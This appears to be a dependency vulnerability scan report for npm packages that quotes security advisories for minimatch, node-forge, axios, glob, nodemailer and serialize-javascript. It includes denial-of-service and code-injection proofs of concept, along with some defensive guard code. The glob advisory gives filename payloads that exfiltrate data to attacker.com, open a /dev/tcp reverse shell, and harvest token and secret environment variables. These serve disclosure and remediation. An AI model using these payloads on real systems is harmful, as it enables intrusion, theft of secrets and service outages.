{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.
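One mitigation, independent of a minimatch upgrade, is to budget attacker-influenced patterns before they ever reach the matcher. The guard below is a hypothetical caller-side pre-check (checkPatternBudget is not a minimatch API, and the limits are illustrative); it exploits the fact that the blow-up above is driven by repeated '**' segments:

```javascript
// Hypothetical pre-check, not part of minimatch: reject patterns whose
// length or number of '**' (globstar) segments exceeds a fixed budget.
function checkPatternBudget(pattern, { maxLength = 1024, maxGlobstars = 4 } = {}) {
  if (pattern.length > maxLength) {
    throw new Error(`pattern length ${pattern.length} exceeds ${maxLength}`);
  }
  const globstars = pattern.split('/').filter(seg => seg === '**').length;
  if (globstars > maxGlobstars) {
    throw new Error(`pattern has ${globstars} '**' segments (max ${maxGlobstars})`);
  }
  return pattern;
}

// The attack pattern from the PoC trips the guard; the benign one passes.
const attack = '**/a/'.repeat(11) + 'b'; // '**/a/**/a/.../a/b', 11 globstars
const benign = '**/y/z';
```

Called before minimatch(path, pattern), this turns a multi-second stall into an immediate, catchable rejection.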

critical: 0 high: 2 medium: 0 low: 0 node-forge 1.3.1 (npm)

pkg:npm/node-forge@1.3.1

high 8.7: CVE--2025--66031 Uncontrolled Recursion

Affected range: <1.3.2
Fixed version: 1.3.2
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.115%
EPSS Percentile: 30th percentile
Description

Summary

An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.

Details

An ASN.1 Denial of Service (DoS) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs, which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost denial of service against applications that parse untrusted ASN.1 objects.
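
The missing guard can be illustrated with a toy recursive TLV walker. This is a sketch, not node-forge's _fromDer: the 0x30 tag, single-byte lengths, and the format itself are simplifying assumptions. The point is that an explicit depth parameter turns stack exhaustion into a catchable error:

```javascript
// Toy DER-like walker: 0x30 <len> <children> is "constructed",
// anything else <len> <bytes> is "primitive". Single-byte lengths only.
// The depth/maxDepth pair is the guard the vulnerable parser lacked.
function walk(buf, offset = 0, depth = 0, maxDepth = 32) {
  if (depth > maxDepth) {
    throw new RangeError(`nesting depth ${depth} exceeds maxDepth ${maxDepth}`);
  }
  const tag = buf[offset];
  const len = buf[offset + 1];
  const end = offset + 2 + len;
  if (tag === 0x30) {
    let child = offset + 2;
    while (child < end) child = walk(buf, child, depth + 1, maxDepth);
  }
  return end; // offset just past this TLV
}

// A tiny blob nested 40 levels deep now fails fast with a clean error
// instead of exhausting the call stack.
let tlv = [0x02, 0x01, 0xff];
for (let i = 0; i < 40; i++) tlv = [0x30, tlv.length, ...tlv];
const deep = Buffer.from(tlv);
```

A blob only 83 bytes long encodes 40 levels of nesting, which is why a depth limit rather than a size limit is the right defense here.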

Impact

This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.

This vulnerability impacts the asn1.fromDer function in node-forge before patched version 1.3.2.

Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.

high 8.7: CVE--2025--12816 Interpretation Conflict

Affected range: <1.3.2
Fixed version: 1.3.2
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.059%
EPSS Percentile: 18th percentile
Description

Summary

CVE-2025-12816 has been reserved by CERT/CC

Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.

Details

A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.

This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).

Impact

This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.

This vulnerability impacts the asn1.validate function in node-forge before patched version 1.3.2. See https://github.com/digitalbazaar/forge/blob/main/lib/asn1.js

The following components in node-forge are impacted.
lib/asn1.js
lib/x509.js
lib/pkcs12.js
lib/pkcs7.js
lib/rsa.js
lib/pbe.js
lib/ed25519.js

Any downstream application using these components is impacted.

These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.

critical: 0 high: 2 medium: 0 low: 0 axios 1.8.4 (npm)

pkg:npm/axios@1.8.4

high 7.5: CVE--2026--25639 Improper Check for Unusual or Exceptional Conditions

Affected range: >=1.0.0, <=1.13.4
Fixed version: 1.13.5
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.036%
EPSS Percentile: 10th percentile
Description

Denial of Service via __proto__ Key in mergeConfig

Summary

The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.

Details

The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:

utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});

When prop is '__proto__':

  1. JSON.parse('{"__proto__": {...}}') creates an object with __proto__ as an own enumerable property
  2. Object.keys() includes '__proto__' in the iteration
  3. mergeMap['__proto__'] performs prototype chain lookup, returning Object.prototype (truthy object)
  4. The expression mergeMap[prop] || mergeDeepProperties evaluates to Object.prototype
  5. Object.prototype(...) throws TypeError: merge is not a function
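
The language behavior the failure chain relies on is observable with plain Node.js, no axios required. This sketch just demonstrates steps 1-3:

```javascript
// JSON.parse creates '__proto__' as an OWN enumerable key...
const parsed = JSON.parse('{"__proto__": {"x": 1}}');
console.log(Object.keys(parsed));            // [ '__proto__' ]

// ...whereas in an object literal, __proto__ is a prototype assignment,
// not an own key:
const literal = { __proto__: { x: 1 } };
console.log(Object.keys(literal));           // []

// A plain-object lookup of '__proto__' climbs the prototype chain and
// returns Object.prototype -- a truthy non-function, which is why
// `mergeMap[prop] || mergeDeepProperties` selects a non-callable value.
const mergeMap = {};
console.log(typeof mergeMap['__proto__']);                // 'object'
console.log(typeof mergeMap['__proto__'] === 'function'); // false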

The mergeConfig function is called by:

  • Axios._request() at lib/core/Axios.js:75
  • Axios.getUri() at lib/core/Axios.js:201
  • All HTTP method shortcuts (get, post, etc.) at lib/core/Axios.js:211,224

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);

Reproduction steps:

  1. Clone axios repository or npm install axios
  2. Create file poc.mjs with the code above
  3. Run: node poc.mjs
  4. Observe the TypeError crash

Verified output (axios 1.13.4):

TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)

Control tests performed:

Test             | Config                                | Result
Normal config    | {"timeout": 5000}                     | SUCCESS
Malicious config | JSON.parse('{"__proto__": {"x": 1}}') | CRASH
Nested object    | {"headers": {"X-Test": "value"}}      | SUCCESS

Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.

Impact

Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

  • Node.js servers using axios for HTTP requests
  • Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.
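
Until a fixed axios version is deployed, callers can strip dangerous own keys from parsed JSON before handing it to the client. sanitizeConfig below is a hypothetical application-side guard, not an axios API:

```javascript
// Hypothetical application-side guard (not part of axios): shallow-copy
// a parsed config, dropping '__proto__' and similar keys as own keys.
function sanitizeConfig(config) {
  const clean = {};
  for (const key of Object.keys(config)) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue;
    clean[key] = config[key];
  }
  return clean;
}

const malicious = JSON.parse('{"__proto__": {"x": 1}, "timeout": 5000}');
const safe = sanitizeConfig(malicious);
console.log(Object.keys(safe)); // [ 'timeout' ]
```

Because Object.keys only returns own enumerable keys, the '__proto__' entry created by JSON.parse is removed while ordinary config fields pass through unchanged.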

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range: >=1.0.0, <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.102%
EPSS Percentile: 28th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, which axios decodes fully into memory on Node before streaming, ignoring maxContentLength and maxBodyLength and enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows data: in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 POST requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
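
Suggestion 1 can be approximated at the application layer today: estimate the decoded size of a data: URI from its Base64 length before the URI reaches any client. The helper below is an assumed caller-side check, not an axios API; Base64 decodes to roughly 3/4 of its encoded length:

```javascript
// Hypothetical pre-check (not part of axios): estimate the decoded byte
// size of a data: URI and reject it before any decoding happens.
function assertDataUriWithinLimit(uri, maxBytes) {
  if (!uri.startsWith('data:')) return; // only guard the data: scheme
  const comma = uri.indexOf(',');
  if (comma === -1) throw new Error('malformed data: URI');
  const meta = uri.slice(5, comma);     // e.g. 'application/octet-stream;base64'
  const body = uri.slice(comma + 1);
  const approxBytes = meta.includes('base64')
    ? Math.floor(body.length * 3 / 4)   // Base64 expands data by ~4/3
    : body.length;
  if (approxBytes > maxBytes) {
    throw new Error(`data: payload ~${approxBytes} bytes exceeds limit ${maxBytes}`);
  }
}

// A large Base64 body is rejected without ever being decoded:
const big = 'data:application/octet-stream;base64,' + 'A'.repeat(1_000_000);
```

Because the check operates on string length alone, it costs O(1) memory regardless of payload size.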

critical: 0 high: 1 medium: 0 low: 0 glob 10.4.5 (npm)

pkg:npm/glob@10.4.5

high 7.5: CVE--2025--64756 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range: >=10.2.0, <10.5.0
Fixed version: 11.1.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score: 0.038%
EPSS Percentile: 11th percentile
Description

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

  1. User runs glob -c <command> <pattern>
  2. CLI finds files matching the pattern
  3. Matched filenames are collected into an array
  4. Command is executed with matched filenames as arguments using shell: true
  5. Shell interprets metacharacters in filenames as command syntax
  6. Malicious filenames execute arbitrary commands

Affected Component:

  • CLI Only: The vulnerability affects only the command-line interface
  • Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
  • Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

  • Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
  • Any directory where attackers can control filenames (PR branches, archives, user uploads)
  • CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

  • The echo command executes normally
  • Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
  • A new file injected_poc is created, proving command execution
  • Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

  • Commands execute with full privileges of the user running glob CLI
  • No privilege escalation required - runs as current user
  • Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

  • Malicious PR adds files with crafted names to repository
  • CI pipeline uses glob -c to process files (linting, testing, deployment)
  • Commands execute in CI environment with build secrets and deployment credentials
  • Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

  • Developer clones repository or extracts archive containing malicious filenames
  • Local build scripts use glob -c for file processing
  • Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

  • Services using glob CLI to process uploaded files or external content
  • File uploads with malicious names trigger command execution
  • Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

  • Malicious packages or themes include files with crafted names
  • Build processes using glob CLI automatically process these files
  • Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

  • POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
  • Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
  • Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

  • Ecosystem: npm
  • Package name: glob
  • Component: CLI only (src/bin.mts)
  • Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
  • Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
  • Patched versions: 11.1.0 and 10.5.0

Scope Limitation:

  • Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
  • CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

  • Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
  • If any glob CLI actions fail, convert commands containing positional arguments to use the --cmd-arg/-g option instead.
  • As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

critical: 0 high: 1 medium: 0 low: 0 async 0.9.2 (npm)

pkg:npm/async@0.9.2

high 7.8: CVE--2021--43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range: <2.6.4
Fixed version: 2.6.4, 3.2.2
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 0.657%
EPSS Percentile: 71st percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

critical: 0 high: 1 medium: 0 low: 0 nodemailer 6.10.1 (npm)

pkg:npm/nodemailer@6.10.1

high 7.5: CVE--2025--14874 Improper Check or Handling of Exceptional Conditions

Affected range: <=7.0.10
Fixed version: 7.0.11
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.086%
EPSS Percentile: 25th percentile
Description

Summary

A DoS can occur that immediately halts the process due to the use of an unsafe recursive function.

Details

According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list.
However, the code implementing this flattening can be exploited by malicious input to trigger a DoS.

RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group.
At the following location in lib/addressparser/index.js:

https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90

there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:

g0: g1: g2: g3: ... gN: victim@example.com;

Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern
addressparser → _handleAddress → addressparser → ...
for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.

The problematic code section is as follows:

if (isGroup) {
    ...
    if (data.group.length) {
        let parsedGroup = addressparser(data.group.join(',')); // <- boom!
        parsedGroup.forEach(member => {
            if (member.group) {
                groupMembers = groupMembers.concat(member.group);
            } else {
                groupMembers.push(member);
            }
        });
    }
}

data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.
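
Pending an upgrade, applications that accept recipient headers from users can bound the nesting before the header reaches Nodemailer. checkGroupDepth below is a hypothetical caller-side guard, not a Nodemailer API; it relies on the fact that each colon can open another group and each group costs one level of recursion:

```javascript
// Hypothetical caller-side guard (not a Nodemailer API): cap the number
// of ':' characters, since each one can open another RFC 5322 group and
// drive one more level of recursion in the address parser.
function checkGroupDepth(header, maxGroups = 10) {
  const colons = (header.match(/:/g) || []).length;
  if (colons > maxGroups) {
    throw new Error(`address header opens ${colons} groups (max ${maxGroups})`);
  }
  return header;
}

// The PoC-style payload is rejected up front; a normal group passes.
const hostile = Array.from({ length: 3000 }, (_, i) => `g${i}:`).join(' ') + ' user@example.com;';
const normal  = 'friends: a@example.com, b@example.com;';
```

The check is deliberately coarse: colons inside quoted display names also count, so legitimate but unusual headers may need a higher limit.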

PoC

const nodemailer = require('nodemailer');

function buildDeepGroup(depth) {
  let parts = [];
  for (let i = 0; i < depth; i++) {
    parts.push(`g${i}:`);
  }
  return parts.join(' ') + ' user@example.com;';
}

const DEPTH = 3000; // <- control depth 
const toHeader = buildDeepGroup(DEPTH);
console.log('to header length:', toHeader.length);

const transporter = nodemailer.createTransport({
  streamTransport: true,
  buffer: true,
  newline: 'unix'
});

console.log('parsing start');

transporter.sendMail(
  {
    from: 'test@example.com',
    to: toHeader,
    subject: 'test',
    text: 'test'
  },
  (err, info) => {
    if (err) {
      console.error('error:', err);
    } else {
      console.log('finished :', info && info.envelope);
    }
  }
);

As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.

Impact

The attacker can achieve the following:

  1. Force an immediate crash of any server/service that uses Nodemailer
  2. Kill the backend process with a single web request
  3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion

critical: 0 high: 1 medium: 0 low: 0 connect-multiparty 2.2.0 (npm)

pkg:npm/connect-multiparty@2.2.0

high 7.8: CVE--2022--29623 Unrestricted Upload of File with Dangerous Type

Affected range: <=2.2.0
Fixed version: Not Fixed
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 0.448%
EPSS Percentile: 63rd percentile
Description

An arbitrary file upload vulnerability in the file upload module of Express Connect-Multiparty 2.2.0 allows attackers to execute arbitrary code via a crafted PDF file. NOTE: the Supplier has not verified this vulnerability report.

critical: 0 high: 1 medium: 0 low: 0 serialize-javascript 6.0.2 (npm)

pkg:npm/serialize-javascript@6.0.2

high 8.1: GHSA--5c6j--r48x--rmvq Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')

Affected range: <=7.0.2
Fixed version: 7.0.3
CVSS Score: 8.1
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!

PoC 2: Code Injection via Date.toISOString()

const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!

PoC 3: Remote Code Execution

const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

critical: 0 high: 1 medium: 0 low: 0 linkifyjs 4.2.0 (npm)

